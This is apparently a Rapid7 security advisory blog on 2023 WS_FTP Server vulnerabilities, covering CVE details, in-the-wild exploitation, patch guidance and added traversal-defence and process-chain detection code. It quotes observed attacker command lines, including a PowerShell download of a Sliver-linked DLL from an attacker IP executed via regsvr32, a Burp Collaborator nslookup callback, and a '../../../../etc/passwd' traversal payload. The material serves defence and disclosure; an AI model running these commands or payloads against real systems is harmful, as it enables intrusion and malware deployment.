Last updated Tuesday, February 27, 2024 17:16:38 GMT

On September 27, 2023, Progress Software published a security advisory on multiple vulnerabilities affecting WS_FTP Server, a secure file transfer solution. The advisory covers a number of vulnerabilities, two of which are critical (CVE-2023-40044 and CVE-2023-42657). Our research team has identified what appears to be a .NET deserialization vulnerability (CVE-2023-40044) and confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget.

Note: As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild. That activity is detailed in the Observed Attacker Behavior section of this blog.

The reported vulnerabilities cover a range of affected versions, and several affect only WS_FTP Server installations that have the Ad Hoc Transfer module enabled. Nevertheless, Progress Software's advisory urges all customers to update to WS_FTP Server 8.8.2, the latest version of the software. Rapid7 echoes this advice. The vendor advisory has guidance on upgrading, as well as information on disabling or removing the Ad Hoc Transfer module.

The critical vulnerabilities are listed below. Note that NVD scores CVE-2023-40044 only as "High" severity rather than Critical:

  • CVE-2023-40044: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, the Ad Hoc Transfer module has a .NET deserialization vulnerability that allows an unauthenticated attacker to execute remote commands on the underlying WS_FTP Server operating system. The vulnerability affects all versions of the WS_FTP Server Ad Hoc Transfer module. Progress Software's advisory indicates that WS_FTP Server installations without the Ad Hoc Transfer module installed are not vulnerable to CVE-2023-40044.
  • CVE-2023-42657: WS_FTP Server versions prior to 8.7.4 and 8.8.2 are vulnerable to a directory traversal vulnerability that allows an attacker to perform file operations (delete, rename, rmdir, mkdir) on files and folders outside of their authorized WS_FTP folder path. Attackers could also escape the context of the WS_FTP Server file structure and perform the same level of operations (delete, rename, rmdir, mkdir) on file and folder locations on the underlying operating system.
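To make the traversal class in CVE-2023-42657 concrete, here is an added Python illustration of a per-user file-operation API. It is not WS_FTP Server code and does not reproduce the actual bug; it shows the unchecked path join that lets `..` (or `..\`) segments walk out of the authorized folder, beside a confined resolver that canonicalizes the path and rejects anything that is not the jail itself or a descendant of it. The jail path, the in-memory file tree and the sample requests are all constructed for the example.

```python
"""Directory traversal in a per-user file-operation API: the unchecked join
beside a confined resolver. Added illustration, not WS_FTP Server code."""
import posixpath

# Constructed jail standing in for a user's authorized WS_FTP folder path.
JAIL = "/srv/wsftp/users/alice"


def _as_posix(user_path: str) -> str:
    # Treat backslashes as separators: on Windows, where WS_FTP Server runs,
    # "..\" walks up the tree just as "../" does.
    return user_path.replace("\\", "/")


def naive_resolve(jail: str, user_path: str) -> str:
    """The bug class: join and normalize, never check where the path landed."""
    return posixpath.normpath(posixpath.join(jail, _as_posix(user_path).lstrip("/")))


def safe_resolve(jail: str, user_path: str) -> str:
    """Hardened: canonicalize, then require the jail itself or a descendant."""
    jail_norm = posixpath.normpath(jail)
    candidate = posixpath.normpath(
        posixpath.join(jail_norm, _as_posix(user_path).lstrip("/")))
    # Compare against the jail plus a separator so that a sibling such as
    # /srv/wsftp/users/alice2 is not accepted as a child of .../alice.
    if candidate != jail_norm and not candidate.startswith(jail_norm + "/"):
        raise PermissionError(f"{user_path!r} resolves outside the authorized folder")
    return candidate


class FakeFs:
    """Minimal in-memory tree so the four operations can run offline."""

    def __init__(self, entries):
        self.entries = set(entries)

    def delete(self, path):
        self.entries.discard(path)

    def rename(self, src, dst):
        self.entries.discard(src)
        self.entries.add(dst)

    def rmdir(self, path):
        self.entries.discard(path)

    def mkdir(self, path):
        self.entries.add(path)


def do_file_op(fs: FakeFs, jail: str, op: str, *user_paths, resolver=safe_resolve):
    """Resolve every user-supplied path, then dispatch delete/rename/rmdir/mkdir."""
    if op not in ("delete", "rename", "rmdir", "mkdir"):
        raise ValueError(op)
    resolved = [resolver(jail, p) for p in user_paths]
    getattr(fs, op)(*resolved)
    return resolved


if __name__ == "__main__":
    fs = FakeFs({"/etc/passwd", JAIL + "/inbox/report.txt"})
    # Unchecked resolver: a relative path deletes a file on the host.
    print(do_file_op(fs, JAIL, "delete", "../../../../etc/passwd", resolver=naive_resolve))
    # Confined resolver: the same request is refused.
    try:
        do_file_op(fs, JAIL, "delete", "../../../../etc/passwd")
    except PermissionError as e:
        print("blocked:", e)
```

The check is done on the canonicalized result rather than by filtering `..` out of the input, which is what keeps mixed separators, `./` segments and sibling-prefix tricks from slipping through; on a real filesystem you would additionally resolve symlinks (for example with `os.path.realpath`) before comparing.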

The other (non-critical) vulnerabilities are listed below. See Progress Software's advisory for details:

  • CVE-2023-40045: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, the Ad Hoc Transfer module is vulnerable to reflected cross-site scripting (XSS). Delivery of a specialized payload could allow an attacker to execute malicious JavaScript within the context of the victim's browser.
  • CVE-2023-40046: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, the Manager interface is vulnerable to SQL injection, which could allow an attacker to infer information about the structure and contents of the database and execute SQL statements that alter or delete database elements.
  • CVE-2023-40047: In WS_FTP Server versions prior to 8.8.2, the Management module is vulnerable to stored cross-site scripting (XSS), which could allow an attacker with administrative privileges to import an SSL certificate with malicious attributes containing cross-site scripting payloads. Once the stored XSS payload is in place, an attacker could use it to target WS_FTP Server admins with a specialized payload that results in the execution of malicious JavaScript within the context of the victim's browser.
  • CVE-2023-40048: In WS_FTP Server versions prior to 8.8.2, the Manager interface was missing cross-site request forgery (CSRF) protection on a POST transaction corresponding to a WS_FTP Server administrative function.
  • CVE-2023-40049: In WS_FTP Server versions prior to 8.8.2, an unauthenticated user could enumerate files under the 'WebServiceHost' directory listing.
  • CVE-2022-27665: WS_FTP Server 8.6.0 is vulnerable to reflected XSS (via an AngularJS sandbox escape expression), which allows an attacker to execute client-side commands by inputting malicious payloads in the subdirectory search bar or the Add Folder filename boxes. For example, there is client-side template injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

Observed Attacker Behavior

On the evening of September 30, 2023, Rapid7 observed what appears to be exploitation of one or more of the recently disclosed WS_FTP vulnerabilities in multiple customer environments. The individual alerts our team responded to occurred within minutes of one another, between 2023-10-01 01:38:43 UTC and 01:41:38 UTC.

The process execution chain looks the same across all observed instances, indicating possible mass exploitation of vulnerable WS_FTP servers. Additionally, our MDR team observed the same Burpsuite domain used across all events, which may indicate a single threat actor behind the activity we have seen.

Great-grandparent process:
C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /noconfig /fullpaths @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\out\e514712b\a2ab2de1\ryvjavth.cmdline"

Parent process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6C8F.tmp" "c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\out\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP"

Child process:
C:\Windows\System32\cmd.exe /c CMD.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

Rapid7 managed services also observed the following attack chain:

Great-grandparent process:
C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent process:
C:\Windows\System32\cmd.exe /c powershell /c "IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll"

Parent process:
powershell /c "IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll"

Child process:
C:\Windows\System32\cmd.exe /c regsvr32 c:\users\public\NTUSER.dll

Upon execution, NTUSER.dll contacted a Cloudflare Workers host at status[.]backendapi-fe4[.]workers[.]dev, from which it dropped an additional file, stage2.zip, into memory. Stage2.zip contains another executable that appears to be written in Golang and communicates with the domain realtime-v1[.]backendapi-fe4[.]workers[.]dev. Analysis of NTUSER.dll determined that it is associated with the Sliver post-exploitation framework.

Mitigation Guidance

Progress Software security advisories have borne increased scrutiny and garnered broader attention from media, users, and the security community since the Cl0p ransomware group's attacks on MOVEit Transfer in May 2023. Secure file transfer technologies more generally continue to be popular targets for both researchers and attackers.

With WS_FTP Server exploitation active in the wild since September 30, we recommend updating to a fixed version on an emergency basis, without waiting for a typical patch cycle to occur. As the advisory notes, "upgrading to a patched release using the full installer is the only way to remediate this issue. There will be an outage to the system while the upgrade is running."

Ideally, upgrade to 8.8.2 as the vendor recommends. If you are using the Ad Hoc Transfer module in WS_FTP Server and are not able to update to a fixed version, consider disabling or removing the module.

See Progress Software's advisory for the latest information.

Rapid7 Customers

InsightVM and Nexpose customers running WS_FTP can assess their exposure to all eight of the CVEs in this blog with authenticated vulnerability checks available in today's (September 29) content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. The following detection rules are deployed and alerting on activity related to WS_FTP Server exploitation:

  • Suspicious Process - WS_FTP Server Process Spawns CMD Child Process
  • Webshell - IIS Spawns CMD Spawns PowerShell
  • Webshell - IIS Spawns PowerShell
  • Webshell - Commands Launched by Webserver
  • Suspicious Process - Burpsuite Related Domain in Command Line
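The detection logic below is an added example, not Rapid7's rule implementation. It runs over constructed Sysmon-style process-creation events modelled on the two chains in the Observed Attacker Behavior section and implements the same ideas as the rules listed above: walk each process's ancestry, flag cmd.exe/PowerShell descended from a w3wp.exe worker, tell the WS_FTP app pool apart from other IIS pools by its `-ap "WSFTPSVR_` argument, and alert on Burp Collaborator (oastify.com) domains in command lines and on regsvr32 loading a DLL from \Users\Public. The process IDs, the abbreviated w3wp/csc/cvtres command lines, the benign DefaultAppPool control events and the 203.0.113.5 address standing in for the real download host are all constructed for the example; the OAST suffix list is an assumption to extend with your own out-of-band services.

```python
"""Process-chain detection over constructed Sysmon-style events.
Added example, not Rapid7's detection-rule implementation."""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events modelled on the two chains in this post. PIDs are made up,
# the w3wp/csc/cvtres command lines are abbreviated, and 203.0.113.5 (a
# documentation address) stands in for the real download host.
EVENTS = [
    Proc(1000, 4, r"C:\Windows\SysWOW64\inetsrv\w3wp.exe",
         r'w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll"'),
    Proc(1001, 1000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
         r"csc.exe /noconfig /fullpaths @ryvjavth.cmdline"),
    Proc(1002, 1001, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
         r"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    Proc(1003, 1002, r"C:\Windows\System32\cmd.exe",
         r"cmd.exe /c CMD.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com"),
    Proc(2000, 4, r"C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe",
         r'w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll"'),
    Proc(2001, 2000, r"C:\Windows\System32\cmd.exe",
         r'cmd.exe /c powershell /c "IWR http://203.0.113.5:3389/bcrypt -OutFile c:\users\public\NTUSER.dll"'),
    Proc(2002, 2001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'powershell /c "IWR http://203.0.113.5:3389/bcrypt -OutFile c:\users\public\NTUSER.dll"'),
    Proc(2003, 2000, r"C:\Windows\System32\cmd.exe",
         r"cmd.exe /c regsvr32 c:\users\public\NTUSER.dll"),
    # Benign control: another app pool compiling a page with no shell involved.
    Proc(3000, 4, r"C:\Windows\System32\inetsrv\w3wp.exe",
         r'w3wp.exe -ap "DefaultAppPool" -v "v4.0" -l "webengine4.dll"'),
    Proc(3001, 3000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
         r"csc.exe /noconfig /fullpaths @abcd1234.cmdline"),
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Out-of-band interaction domains (assumed list; add your own OAST services).
OAST_SUFFIXES = (".oastify.com", ".burpcollaborator.net")
WSFTP_POOL = re.compile(r'-ap\s+"WSFTPSVR_', re.IGNORECASE)
PUBLIC_DLL = re.compile(r"regsvr32\s+\S*\\users\\public\\", re.IGNORECASE)


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid: dict, proc: Proc) -> list:
    """Parent, grandparent, ... as far as the event set can resolve them."""
    chain, seen = [], {proc.pid}
    cur = by_pid.get(proc.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(events: list) -> list:
    """Return (pid, rule name) pairs for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for p in events:
        chain = ancestors(by_pid, p)
        workers = [a for a in chain if basename(a.image) == "w3wp.exe"]
        name = basename(p.image)
        if name in SHELLS and workers:
            # The outermost worker tells us which app pool the shell came from.
            if WSFTP_POOL.search(workers[-1].cmdline):
                alerts.append((p.pid, "WS_FTP Server process spawns CMD/PowerShell descendant"))
            else:
                alerts.append((p.pid, "Commands launched by webserver"))
            if name != "cmd.exe" and chain and basename(chain[0].image) == "cmd.exe":
                alerts.append((p.pid, "IIS spawns CMD spawns PowerShell"))
        if any(s in p.cmdline.lower() for s in OAST_SUFFIXES):
            alerts.append((p.pid, "Burp Collaborator domain in command line"))
        if PUBLIC_DLL.search(p.cmdline):
            alerts.append((p.pid, "regsvr32 loading a DLL from a user-writable path"))
    return alerts


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

Keying on the full ancestry rather than the immediate parent matters here: in the first chain the shell's parent is cvtres.exe, two hops below w3wp.exe, so a parent-only rule would miss it. The benign csc.exe events under DefaultAppPool produce no alerts, which is the behaviour you want given how routinely ASP.NET compiles pages.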

Velociraptor has an artifact available to detect strings associated with potential WS_FTP exploitation in IIS logs.

Updates

September 30: Updated to note that Rapid7 is observing multiple instances of WS_FTP exploitation in the wild and that Velociraptor has an artifact available to assist in threat hunting. Proof-of-concept exploit code for CVE-2023-40044 is also publicly available as of the evening of Friday, September 29. Assetnote, which discovered CVE-2023-40044, has a full write-up available here as of September 30.

October 1: Updated with details on a second attack chain observed by Rapid7 managed services.

October 2: Updated to specify the detection rules alerting on WS_FTP Server exploitation for Rapid7 MDR and InsightIDR customers.